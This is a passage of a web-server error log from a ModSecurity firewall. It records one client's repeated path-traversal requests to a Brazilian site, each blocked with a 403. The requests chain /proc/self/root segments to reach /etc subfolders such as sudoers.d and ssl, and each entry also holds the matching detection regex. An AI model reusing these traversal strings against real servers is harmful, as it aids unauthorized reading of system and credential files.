[tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnN0r9dMAiw-8KANNfxwAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:28.512748 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.241.46:35966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnOLABkC4fWIHEf8EMiQAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:29.876169 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:35978] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnObABkC4fWIHEf8EMiwAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:31.223176 2026] [:error] [pid 14895:tid 140411658000128] [client 74.7.241.46:35980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnO1ajLEzk2WiQ-10qLQAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:32.358707 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:35982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnPLABkC4fWIHEf8EMkQAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:33.875684 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:35986] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnPbABkC4fWIHEf8EMkgAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:35.070516 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:35998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnP7ABkC4fWIHEf8EMlAAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:36.431819 2026] [:error] [pid 29507:tid 140411716749056] [client 74.7.241.46:36002] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnQEr9dMAiw-8KANNf1QAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:37.683578 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.241.46:36014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnQdSswJuvopo3lOh2mwAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:39.183381 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:36924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnQ7ABkC4fWIHEf8EMmwAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:41.570402 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.241.46:36934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnRKQpVkWug9HeOt9MwgAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:43.173783 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.241.46:36948] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnR6QpVkWug9HeOt9MxgAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:44.553337 2026] [:error] [pid 29507:tid 140411574073088] [client 74.7.241.46:36956] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnSEr9dMAiw-8KANNf4gAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:46.036009 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:36962] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnSs_BxrYCr4hPDw8B7gAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:47.278596 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:36966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnS7ysWC90G-1nBrBcOgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:49.338140 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.241.46:40884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnTFajLEzk2WiQ-10qNgAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:50.769793 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:40888] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnTtSswJuvopo3lOh2oAAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:52.088370 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:40892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnULysWC90G-1nBrBcPAAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:54.453021 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.241.46:40900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnUdSswJuvopo3lOh2ogAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:55.955012 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.241.46:40914] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnU6TCbgAP5jq5TehD-wAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:57.195584 2026] [:error] [pid 29802:tid 140411540502272] [client 74.7.241.46:40926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnVc_BxrYCr4hPDw8B8wAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:25:58.586136 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.241.46:39344] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnVrysWC90G-1nBrBcPQAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
